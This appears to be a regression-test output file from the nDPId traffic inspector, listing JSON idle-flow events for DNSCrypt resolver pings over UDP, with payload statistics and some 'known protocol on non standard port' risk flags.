-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317463,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":49008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":180000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":587,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739611961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
